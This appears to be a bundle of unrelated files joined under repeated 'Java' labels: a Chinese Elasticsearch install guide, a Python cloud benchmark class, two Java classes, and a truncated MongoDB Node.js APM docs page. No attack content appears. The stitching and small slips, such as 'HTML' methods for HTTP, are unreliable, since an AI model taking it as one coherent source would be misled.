# Elasticsearch 安装记录 ## Elasticsearch 介绍 Elasticsearch是一个基于Java的实时分布式搜索和分析引擎,能够对数据进行实时处理、分析。<br> 本次安装的操作系统环境为**Ubuntu 16.04 64bit**,将按照[《Elasticsearch权威指南》](https://github.com/looly/elasticsearch-definitive-guide-cn)中的流程进行。 ## Java环境 在终端输入 ```sh sudo apt-get install default-jre ``` 安装最新版本的Java运行环境。安装结束后可输入 ```sh java -version ``` 检查是否安装成功。如果安装成功,会返回Java的版本号,如1.8.0_131。<br><br> *注:需要注意的是,如果Ubuntu的更新源选择不恰当,极有可能安装失败。aliyun的源实测可用,建议在安装前换源。* ## 运行Elasticsearch ### 方式一:通过下载安装包 从官方网站 https://www.elastic.co/downloads/elasticsearch 下载最新版本的Elasticsearch。<br><br> 拷贝tar包至工作目录后,输入 ```sh tar -xvf elasticsearch-$VERSION.tar.gz ``` 解压文件,其中将$VERSION替换为当前版本号。<br><br> 输入 ```sh ./elasticsearch-$VERSION/bin/elasticsearch ``` 运行Elasticsearch。<br><br> *注:如果需要在后台运行,添加命令行参数-d即可。*<br><br> 稍等片刻,运行成功会显示 ```sh [0] indices into cluster_state ``` ### 方式二:通过Debian Package 部分操作与后续安装Kibana相同,执行一次即可。<br><br> 默认安装目录为 /usr/share/elasticsearch/。<br><br> Import the Elasticsearch PGP Key ```sh wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add - ``` Installing from the APT repository ```sh sudo apt-get install apt-transport-https echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list ``` Install the Elasticsearch Debian package ```sh sudo apt-get update && sudo apt-get install elasticsearch ``` 需要注意的是,此时不能以root权限直接运行可执行文件,而应通过服务启动: ```sh service elasticsearch start ``` ### 验证安装 此时另开启一个终端,输入 ```sh curl 'http://localhost:9200' ``` 检验Elasticsearch是否运行,若正在运行则会返回(文本可能由于版本差异不同) ```json { "name" : "RcmBSMl", "cluster_name" : "elasticsearch", "cluster_uuid" : "M6u8eyc8QF6cIAWOh0RkMQ", "version" : { "number" : "5.5.0", "build_bash" : "260387d", "build_date" : "2017-06-30T23:16:05.735Z", "build_snapshot" : false, "lucene_version" : "6.6.0" }, "tagline" : "You Know, for Search" } ``` ## 运行Demo Elasticsearch数据库可使用HTML的GET、PUT等方法访问和修改。 ### PUT添加数据 ```sh curl -T $JSON_FILE "http://localhost:9200/$INDEX/$TYPE/$ID" ``` 其中$JSON_FILE是json数据文件,$INDEX是索引名,$TYPE是类型名,$ID是记录编号。<br><br> 另外,若相同编号的记录已存在,PUT操作则会更新之。 ### GET访问数据 ```sh curl -XGET "http://localhost:9200/$INDEX/$TYPE/$ID" ``` ### GET无条件查询数据 ```sh curl -XGET "http://localhost:9200/$INDEX/$TYPE/_search" ``` 该操作会列出同索引同类型的所有记录。 ### GET条件查询数据 ```sh curl -XGET "http://localhost:9200/$INDEX/$TYPE/_search?q=$COND:$VALUE" ``` 其中$COND是条件名,$VALUE是条件值,该操作会列出同索引同类型符合条件的记录。 ### DELETE删除数据 ```sh curl -XDELETE "http://localhost:9200/$INDEX/$TYPE/$ID" ``` <br> 更多方法详见 [官方文档](https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html) 。
Java
# Copyright (c) 2015 Intel Research and Development Ireland Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import instantiation_validation_benchmark as base from experimental_framework import common NUM_OF_NEIGHBORS = 'num_of_neighbours' AMOUNT_OF_RAM = 'amount_of_ram' NUMBER_OF_CORES = 'number_of_cores' NETWORK_NAME = 'network' SUBNET_NAME = 'subnet' class InstantiationValidationNoisyNeighborsBenchmark( base.InstantiationValidationBenchmark): def __init__(self, name, params): base.InstantiationValidationBenchmark.__init__(self, name, params) if common.RELEASE == 'liberty': temp_name = 'stress_workload_liberty.yaml' else: temp_name = 'stress_workload.yaml' self.template_file = common.get_template_dir() + \ temp_name self.stack_name = 'neighbour' self.neighbor_stack_names = list() def get_features(self): features = super(InstantiationValidationNoisyNeighborsBenchmark, self).get_features() features['description'] = 'Instantiation Validation Benchmark ' \ 'with noisy neghbors' features['parameters'].append(NUM_OF_NEIGHBORS) features['parameters'].append(AMOUNT_OF_RAM) features['parameters'].append(NUMBER_OF_CORES) features['parameters'].append(NETWORK_NAME) features['parameters'].append(SUBNET_NAME) features['allowed_values'][NUM_OF_NEIGHBORS] = \ ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10'] features['allowed_values'][NUMBER_OF_CORES] = \ ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10'] features['allowed_values'][AMOUNT_OF_RAM] = \ ['256M', '1G', '2G', '3G', '4G', '5G', '6G', '7G', '8G', '9G', '10G'] features['default_values'][NUM_OF_NEIGHBORS] = '1' features['default_values'][NUMBER_OF_CORES] = '1' features['default_values'][AMOUNT_OF_RAM] = '256M' features['default_values'][NETWORK_NAME] = '' features['default_values'][SUBNET_NAME] = '' return features def init(self): super(InstantiationValidationNoisyNeighborsBenchmark, self).init() common.replace_in_file(self.lua_file, 'local out_file = ""', 'local out_file = "' + self.results_file + '"') heat_param = dict() heat_param['network'] = self.params[NETWORK_NAME] heat_param['subnet'] = self.params[SUBNET_NAME] heat_param['cores'] = self.params['number_of_cores'] heat_param['memory'] = self.params['amount_of_ram'] for i in range(0, int(self.params['num_of_neighbours'])): stack_name = self.stack_name + str(i) common.DEPLOYMENT_UNIT.deploy_heat_template(self.template_file, stack_name, heat_param) self.neighbor_stack_names.append(stack_name) def finalize(self): common.replace_in_file(self.lua_file, 'local out_file = "' + self.results_file + '"', 'local out_file = ""') # destroy neighbor stacks for stack_name in self.neighbor_stack_names: common.DEPLOYMENT_UNIT.destroy_heat_template(stack_name) self.neighbor_stack_names = list()
Java
package de.nl.moo.data.loader.systems; import de.nl.moo.data.beans.systems.SystemsApplyerBean; import de.nl.moo.data.beans.systems.SystemsBean; import de.nl.moo.data.beans.systems.SystemsSystemBean; import de.nl.moo.data.dao.GameBeanDAO; import de.nl.moo.data.loader.AbstractBeanLoader; import org.springframework.beans.factory.annotation.Autowired; import javax.inject.Provider; import java.nio.file.Path; import java.util.ArrayList; import java.util.List; public class SystemsBeanLoader extends AbstractBeanLoader<SystemsBean> { @Autowired private SystemsBean systemsBean = null; @Autowired private Provider<SystemsSystemBeanLoader> systemLoaderProvider = null; @Autowired private Provider<SystemsApplyerBeanLoader> applyerLoaderProvider = null; public SystemsBeanLoader() { super(); } @Override protected SystemsBean load(GameBeanDAO dao) { List<SystemsApplyerBean> applyers = this.loadApplyers(dao); this.systemsBean.setApplyers(applyers); List<SystemsSystemBean> systems = this.loadSystems(dao); this.systemsBean.setSystems(systems); return this.systemsBean; } // ############################################## private List<SystemsApplyerBean> loadApplyers(GameBeanDAO dao) { Path file = dao.getFile(); Path parent = file.getParent(); List<String> paths = dao.getList("applyers"); List<SystemsApplyerBean> applyers = new ArrayList<>(); paths.stream() .map(parent::resolve) .map(this::loadApplyer) .forEach(applyers::add); return applyers; } private SystemsApplyerBean loadApplyer(Path path) { SystemsApplyerBeanLoader beanLoader = this.applyerLoaderProvider.get(); SystemsApplyerBean applyerBean = beanLoader.load(path); return applyerBean; } // ############################################## private List<SystemsSystemBean> loadSystems(GameBeanDAO dao) { Path file = dao.getFile(); Path parent = file.getParent(); List<String> paths = dao.getList("systems"); List<SystemsSystemBean> systems = new ArrayList<>(); paths.stream() .map(parent::resolve) .map(this::loadSystem) .forEach(systems::add); return systems; } private SystemsSystemBean loadSystem(Path path) { SystemsSystemBeanLoader beanLoader = this.systemLoaderProvider.get(); SystemsSystemBean systemBean = beanLoader.load(path); return systemBean; } }
Java
package com.github.setial.intellijjavadocs.configuration.impl; import com.github.setial.intellijjavadocs.configuration.JavaDocConfiguration; import com.github.setial.intellijjavadocs.exception.SetupTemplateException; import com.github.setial.intellijjavadocs.model.settings.JavaDocSettings; import com.github.setial.intellijjavadocs.model.settings.Level; import com.github.setial.intellijjavadocs.model.settings.Mode; import com.github.setial.intellijjavadocs.model.settings.Visibility; import com.github.setial.intellijjavadocs.template.DocTemplateManager; import com.intellij.openapi.components.PersistentStateComponent; import com.intellij.openapi.components.ServiceManager; import com.intellij.openapi.components.State; import com.intellij.openapi.components.Storage; import com.intellij.openapi.diagnostic.Logger; import com.intellij.openapi.ui.Messages; import org.jdom.Element; import org.jetbrains.annotations.NotNull; import org.jetbrains.annotations.Nullable; import java.util.HashSet; import java.util.Set; import static com.github.setial.intellijjavadocs.configuration.JavaDocConfiguration.COMPONENT_CONFIG_PATH; /** * The type Java doc configuration impl. * * @author Sergey Timofiychuk */ @State( name = JavaDocConfiguration.COMPONENT_NAME, storages = { @Storage(value = COMPONENT_CONFIG_PATH) } ) public class JavaDocConfigurationImpl implements JavaDocConfiguration, PersistentStateComponent<Element> { public static final String JAVADOCS_PLUGIN_TITLE_MSG = "Javadocs plugin"; private static final Logger LOGGER = Logger.getInstance(JavaDocConfigurationImpl.class); private JavaDocSettings settings; private DocTemplateManager templateManager; private boolean loadedStoredConfig = false; /** * Instantiates a new Java doc configuration object. */ public JavaDocConfigurationImpl() { templateManager = ServiceManager.getService(DocTemplateManager.class); initSettings(); } @Override public JavaDocSettings getConfiguration() { return settings; } @Nullable @Override public Element getState() { Element root = new Element("JAVA_DOC_SETTINGS_PLUGIN"); if (settings != null) { settings.addToDom(root); loadedStoredConfig = true; } return root; } @Override public void loadState(@NotNull Element javaDocSettings) { settings = new JavaDocSettings(javaDocSettings); setupTemplates(); loadedStoredConfig = true; } private void initSettings() { if (!loadedStoredConfig) { // setup default values settings = new JavaDocSettings(); Set<Level> levels = new HashSet<>(); levels.add(Level.TYPE); levels.add(Level.METHOD); levels.add(Level.FIELD); Set<Visibility> visibilities = new HashSet<>(); visibilities.add(Visibility.PUBLIC); visibilities.add(Visibility.PROTECTED); visibilities.add(Visibility.DEFAULT); settings.getGeneralSettings().setOverriddenMethods(false); settings.getGeneralSettings().setSplittedClassName(true); settings.getGeneralSettings().setMode(Mode.UPDATE); settings.getGeneralSettings().setLevels(levels); settings.getGeneralSettings().setVisibilities(visibilities); settings.getTemplateSettings().setClassTemplates(templateManager.getClassTemplates()); settings.getTemplateSettings().setConstructorTemplates(templateManager.getConstructorTemplates()); settings.getTemplateSettings().setMethodTemplates(templateManager.getMethodTemplates()); settings.getTemplateSettings().setFieldTemplates(templateManager.getFieldTemplates()); } } @Override public void setupTemplates() { try { templateManager.setClassTemplates(settings.getTemplateSettings().getClassTemplates()); templateManager.setConstructorTemplates(settings.getTemplateSettings().getConstructorTemplates()); templateManager.setMethodTemplates(settings.getTemplateSettings().getMethodTemplates()); templateManager.setFieldTemplates(settings.getTemplateSettings().getFieldTemplates()); } catch (SetupTemplateException e) { LOGGER.error(e); Messages.showErrorDialog("Javadocs plugin is not available, cause: " + e.getMessage(), JAVADOCS_PLUGIN_TITLE_MSG); } } }
Java
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keyword" content=""> <link rel="shortcut icon" href="/node-mongodb-native/3.1/img/favicon.png"> <title>APM</title> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/bootstrap.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/font-awesome/css/font-awesome.min.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/css/mongodb-docs.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/css/overrides.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/highlight/styles/idea.css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/bootstrap-toggle/bootstrap-toggle.min.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/css/java.css" type="text/css" /> </head> <body> <section id="container" class=""> <header id="header-db" class="row" role="navigation"> <div class="header-content"> <div class="toggle-nav pull-left"> <i class="fa fa-bars"></i> <div class="icon-reorder tooltips" data-original-title="Toggle Navigation" data-placement="bottom"></div> </div> <div class="logo pull-left"> <a href="https://www.mongodb.com/"> <img src="http://mongodb.github.io/node-mongodb-native/img/logo-mongodb-header.png", alt="MongoDB.com" /> </a> </div> <div> <div class="nav-items pull-right"> <a href="https://university.mongodb.com" data-toggle="tooltip" data-placement="bottom" title="Free Online Classes">MongoDB University</a> <a href="http://www.mongodb.org/downloads" data-toggle="tooltip" data-placement="bottom" title="Download MongoDB">Downloads</a> <a href="http://www.mongodb.org/get-involved" data-toggle="tooltip" data-placement="bottom" title="Get involved with MongoDB">Community</a> <a href="http://docs.mongodb.org" data-toggle="tooltip" data-placement="bottom" title="The MongoDB Documentation">Docs</a> <a href="http://blog.mongodb.org" data-toggle="tooltip" data-placement="bottom" title="The MongoDB Blog">Blog</a> <div id="search"> <form method="get" action="//www.google.com/search" target="_blank"> <input type="text" name="searchQuery" size="20" value="" autocomplete="off" placeholder="Search docs"> <input type="hidden" name="site" value="/node-mongodb-native/3.1"> <input type="hidden" name="q" value=""> <label for="searchQuery"><i class="fa fa-search fa-1"></i></label> </form> </div> </div> </div> </div> </header> <aside id="sidebar" class="sidebar"> <div class="ssidebar nav-collapse"> <div class="ssidebarwrapper"> <h3> <a class="index-link" href="/node-mongodb-native/3.1/../">MongoDB Node.js Driver</a> <a class="version pull-right" href="/node-mongodb-native/3.1">3.1</a> </h3> <ul class="sidebar-menu"> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/installation-guide/installation-guide/"> <i class='fa fa-puzzle-piece'></i> Installation Guide </a> </li> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/quick-start/quick-start/"> <i class='fa fa-road'></i> Quick Start </a> </li> <li class="toctree-l1 "> <a href="/node-mongodb-native/3.1/tutorials/main/" class=""> <i class='fa fa-thumb-tack'></i> <span>Tutorials</span> <span class="menu-arrow fa fa-angle-right"></span> </a> <ul > <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/tutorials/connect/" class=""> <i class='fa'></i> <span>Connect to MongoDB</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/connect/authenticating/"> <i class='fa'></i> Authentication </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/connect/ssl/"> <i class='fa'></i> SSL Settings </a> </li> </ul> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/collations/"> <i class='fa'></i> Collations </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/collections/"> <i class='fa'></i> Collections </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/create-indexes/"> <i class='fa'></i> Create Indexes </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/crud/"> <i class='fa'></i> CRUD Operations </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/projections/"> <i class='fa'></i> Projections </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/aggregation/"> <i class='fa'></i> Aggregation </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/text-search/"> <i class='fa'></i> Text Search </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/geospatial-search/"> <i class='fa'></i> Geospatial Search </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/commands/"> <i class='fa'></i> Database Commands </a> </li> <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/tutorials/gridfs/" class=""> <i class='fa'></i> <span>GridFS</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/gridfs/streaming/"> <i class='fa'></i> GridFS API </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/gridfs/gridstore/"> <i class='fa'></i> Legacy GridStore </a> </li> </ul> </li> </ul> </li> <li class="toctree-l1 current"> <a href="/node-mongodb-native/3.1/reference/main/" class=""> <i class='fa fa-book'></i> <span>Reference</span> <span class="menu-arrow fa fa-angle-down"></span> </a> <ul class="current"> <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/reference/connecting/" class=""> <i class='fa'></i> <span>Connection Options</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/connecting/connection-settings/"> <i class='fa'></i> Connection Settings </a> </li> </ul> </li> <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/reference/ecmascriptnext/" class=""> <i class='fa'></i> <span>ECMAScript Next</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/ecmascriptnext/connecting/"> <i class='fa'></i> Connecting </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/ecmascriptnext/crud/"> <i class='fa'></i> CRUD Operations </a> </li> </ul> </li> <li class="toctree-l2 current"> <a href="/node-mongodb-native/3.1/reference/management/" class=""> <i class='fa'></i> <span>Management</span> </a> <ul class="current"> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/management/logging/"> <i class='fa'></i> Logging </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/management/apm/"> <i class='fa'></i> APM </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/management/sdam-monitoring/"> <i class='fa'></i> Topology Monitoring </a> </li> </ul> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/reference/pool/"> <i class='fa'></i> Pool Design </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/reference/faq/"> <i class='fa'></i> Frequently Asked Questions </a> </li> </ul> </li> <li class="toctree-l1 "> <a href="/node-mongodb-native/3.1/upgrade-migration/main/" class=""> <i class='fa fa-cog'></i> <span>Upgrade Guide</span> <span class="menu-arrow fa fa-angle-right"></span> </a> <ul > <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/upgrade-migration/upgrading/"> <i class='fa fa-wrench'></i> Upgrading to 2.x </a> </li> </ul> </li> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/api"> <i class='fa fa-file-text-o'></i> API Documentation </a> </li> <li class="toctree-l1"> <a href="https://github.com/mongodb/node-mongodb-native"> <i class='fa fa-github'></i> Source Code </a> </li> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/issues-help/"> <i class='fa fa-life-ring'></i> Issues &amp; Help </a> </li> <li class="toctree-l1"> <a href="https://gitter.im/mongodb/node-mongodb-native?utm_source=badge&amp;utm_medium=badge&amp;utm_campaign=pr-badge"> <img src='https://badges.gitter.im/Join Chat.svg'/> </a> </li> </ul> </div> </div> </aside> <div class="option-popup closed hidden" id="optionsVersionsPopup"> <div class="option-header"> <i class="fa fa-gear"></i> <span>OPTIONS</span> <i class="fa fa-angle-up pull-right"></i> </div> <div class="option-body"> <ul> <li> <label>Version</label> <div class="btn-group btn-group-xs pull-right"> <button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown"> Select Version <span class="caret"></span> </button> <ul class="dropdown-menu" role="menu" id="optionsVersionsMenu"> </ul> </div> </li> </ul> </div> </div> <section id="main-content" class="content"> <section class="main-column pull-left"> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="alert alert-info" role="alert"> Note: You are currently viewing version 3.1 of the Node.js driver documentation. <a href="https://docs.mongodb.com/drivers/node">Click here</a> for the latest version. </div> <a class="edit-link" href="https://github.com/mongodb/node-mongodb-native/blob/3.1/docs/reference/content/reference/management/apm.md" target="_blank" title="Edit reference/management/apm.md on GitHub"><i class="fa fa-pencil-square-o"></i></a> <div class="bc"> <ul> <li><a href="/node-mongodb-native/3.1/reference/main/">Reference</a> <i class="fa fa-angle-right"></i></li> <li><a href="/node-mongodb-native/3.1/reference/management/">Management</a> <i class="fa fa-angle-right"></i></li> <li>APM</li> </ul> </div> <h1 id="apm">APM</h1> <p>Application Performance Monitoring support is a driver feature that allows monitoring services to hook into the driver in a forward compatible and stable way. The API is not applied to the driver unless explicitly initialized to avoid any performance penalties.</p> <h2 id="api">API</h2> <p>The following code example hooks into all the available features of the APM API.</p> <pre><code class="language-js">const listener = require('mongodb').instrument({ operationIdGenerator: { operationId: 1, next: function() { return this.operationId++; } }, timestampGenerator: { current: function() { return new Date().getTime(); }, duration: function(start, end) { return end - start; } } }, function(err, instrumentations) { // Instrument the driver }); listener.on('started', function(event) { // command start event (see https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst) }); listener.on('succeeded', function(event) { // command success event (see https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst) }); listener.on('failed', function(event) { // command failure event (see https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst) }); </code></pre> <p>There are two main aspects to the APM API. The first one is the command monitoring specification and the second one is the instrumentation method.</p> <h2 id="command-monitoring">Command Monitoring</h2> <p>Command monitoring is based on the cross-driver specification for MongoDB found in the Command monitoring <a href="https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst">specification</a>.</p> <p>The Command monitoring specification is a low-level monitoring specification that sends a notification when a new command is executed against MongoDB and if it fails or succeeds. In most cases this is straightforward and you will receive a single start and either a success or failure event.</p> <p>In this example, the user executes the <code>isMaster</code> command against the server and receives the following messages (full objects are abbreviated for simplicity&rsquo;s sake). When the <code>isMaster</code> command starts execution we receive the following event (this result is from <code>JSON.stringify</code>; in the real event the connectionId is the actual connection object the command was executed against).</p> <pre><code class="language-js">{ &quot;command&quot;: { &quot;ismaster&quot;: true }, &quot;databaseName&quot;: &quot;system&quot;, &quot;commandName&quot;: &quot;ismaster&quot;, &quot;requestId&quot;: 7, &quot;operationId&quot;: 1, &quot;connectionId&quot;: { &quot;id&quot;: 8, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } </code></pre> <p><code>requestId</code> is the id used for the wire protocol message sent to MongoDB and allows you to correlate the commands executed on MongoDB with the commands from the driver.</p> <p><code>operationId</code> is an id that is used to group commands into a single logical command execution. Use cases are queries and batch writes where a single logical operation might be executed as multiple commands to the server. For a query this might mean it gets executed as a <code>find</code> command and <em>n</em> number of <code>getMore</code> commands as well as a <code>killCursors</code> command. For bulk writes the logical grouping might contain <code>n</code> individual write operations. The goal of <code>operationId</code> is to allow APM providers to correlate the breakdown of a cursor or bulk operation with the method called by the user.</p> <p>A typical example:</p> <pre><code class="language-js">db.collection('data').find().batchSize(2).toArray(function(err, docs) { }); </code></pre> <p>That might be translated to <code>1</code> find, <code>n</code> getMores and <code>0|1</code> killCursors.</p> <p>After the command executed successfully it sends the following result:</p> <pre><code class="language-js">{ &quot;duration&quot;: 0, &quot;commandName&quot;: &quot;ismaster&quot;, &quot;requestId&quot;: 7, &quot;operationId&quot;: 1, &quot;connectionId&quot;: { &quot;id&quot;: 8, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: { &quot;ismaster&quot;: true, &quot;maxBsonObjectSize&quot;: 16777216, &quot;maxMessageSizeBytes&quot;: 48000000, &quot;maxWriteBatchSize&quot;: 1000, &quot;localTime&quot;: &quot;2015-08-04T10:26:01.445Z&quot;, &quot;maxWireVersion&quot;: 3, &quot;minWireVersion&quot;: 0, &quot;ok&quot;: 1 } } </code></pre> <p>Notice that the <code>requestId</code> and <code>operationId</code> match up to the start message, allowing the user of the API to correlate the two events.</p> <p>The next example shows a complete <code>find</code> operation that results in multiple <code>getMore</code> responses.</p> <pre><code class="language-js">{ &quot;command&quot;: { &quot;find&quot;: &quot;apm_test_2&quot;, &quot;filter&quot;: { &quot;a&quot;: 1 }, &quot;sort&quot;: { &quot;a&quot;: 1 }, &quot;projection&quot;: { &quot;_id&quot;: 1, &quot;a&quot;: 1 }, &quot;limit&quot;: 100, &quot;skip&quot;: 1, &quot;hint&quot;: { &quot;_id&quot;: 1 }, &quot;batchSize&quot;: 2, &quot;comment&quot;: &quot;some comment&quot;, &quot;maxTimeMS&quot;: 5000, &quot;noCursorTimeout&quot;: true }, &quot;databaseName&quot;: &quot;integration_tests&quot;, &quot;commandName&quot;: &quot;find&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } { &quot;duration&quot;: 1, &quot;commandName&quot;: &quot;find&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: [ { &quot;_id&quot;: &quot;55c096386e3b2283b70c294d&quot;, &quot;a&quot;: 1 }, { &quot;_id&quot;: &quot;55c096386e3b2283b70c294e&quot;, &quot;a&quot;: 1 } ] } { &quot;command&quot;: { &quot;getMore&quot;: &quot;104961726686&quot;, &quot;collection&quot;: &quot;apm_test_2&quot;, &quot;batchSize&quot;: 2, &quot;maxTimeMS&quot;: 5000 }, &quot;databaseName&quot;: &quot;integration_tests&quot;, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } { &quot;duration&quot;: 1, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: [ { &quot;_id&quot;: &quot;55c096386e3b2283b70c294f&quot;, &quot;a&quot;: 1 }, { &quot;_id&quot;: &quot;55c096386e3b2283b70c2950&quot;, &quot;a&quot;: 1 } ] } { &quot;command&quot;: { &quot;getMore&quot;: &quot;104961726686&quot;, &quot;collection&quot;: &quot;apm_test_2&quot;, &quot;batchSize&quot;: 2, &quot;maxTimeMS&quot;: 5000 }, &quot;databaseName&quot;: &quot;integration_tests&quot;, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 45, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } { &quot;duration&quot;: 0, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 45, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: [ { &quot;_id&quot;: &quot;55c096386e3b2283b70c2951&quot;, &quot;a&quot;: 1 } ] } </code></pre> <p><strong>Note:</strong> all the documents share the same <code>operationId</code>, allowing the APM API user to correctly map the low level commands to the logical command executed by the user (in this case <code>toArray</code> on a cursor).</p> <h3 id="operationidgenerator">operationIdGenerator</h3> <p>The <code>operationIdGenerator</code> option allows the API user to pass in a custom <code>operationId</code> generator object. You can use this object to synchronize internal request IDs in the APM client with the low-level command monitoring API. This synchronization makes it possible to associate the logical method called by the user&rsquo;s code with the low-level commands issued to MongoDB. This allows for a richer APM experience and performance breakdown. Below is a simple <code>operationIdGenerator</code> example.</p> <pre><code class="language-js">const generator = { operationId: 1, next: function() { return this.operationId++; } }; </code></pre> <h3 id="timestampgenerator">timestampGenerator</h3> <p>The <code>timestampGenerator</code> option lets the API user to override the method used to timestamp the command monitoring events with a custom timestamp type. The generator contains two methods. <code>current</code> returns the current timestamp<code>and</code>duration<code>calculates the total operation duration between the</code>start<code>and</code>end` time. Below is a simple generator example.</p> <pre><code class="language-js">const generator = { current: function() { return new Date().getTime(); }, duration: function(start, end) { return end - start; } } </code></pre> <h2 id="instrumentation">Instrumentation</h2> <p>The <code>instrumentation</code> callback returns the instrumentation points in the driver and associated metadata. In the following example, the result shown is the result from performing <code>JSON.stringify</code>.</p> <pre><code class="language-js">{ &quot;name&quot;: &quot;Gridstore&quot;, &quot;stream&quot;: true, &quot;instrumentations&quot;: [ { &quot;methods&quot;: [ &quot;open&quot;, &quot;getc&quot;, &quot;puts&quot;, &quot;write&quot;, &quot;writeFile&quot;, &quot;close&quot;, &quot;unlink&quot;, &quot;readlines&quot;, &quot;rewind&quot;, &quot;read&quot;, &quot;tell&quot;, &quot;seek&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: true } }, { &quot;methods&quot;: [ &quot;eof&quot; ], &quot;options&quot;: { &quot;callback&quot;: false, &quot;promise&quot;: false, &quot;returns&quot;: [ null ] } }, { &quot;methods&quot;: [ &quot;stream&quot; ], &quot;options&quot;: { &quot;callback&quot;: false, &quot;promise&quot;: false, &quot;returns&quot;: [ null ] } }, { &quot;methods&quot;: [ &quot;destroy&quot; ], &quot;options&quot;: { &quot;callback&quot;: false, &quot;promise&quot;: false } }, { &quot;methods&quot;: [ &quot;chunkCollection&quot;, &quot;collection&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: false, &quot;returns&quot;: [ null ] } }, { &quot;methods&quot;: [ &quot;exist&quot;, &quot;list&quot;, &quot;read&quot;, &quot;readlines&quot;, &quot;unlink&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: true, &quot;static&quot;: true } } ] } </code></pre> <ul> <li><code>name</code> the name of the class exposed for instrumentation.</li> 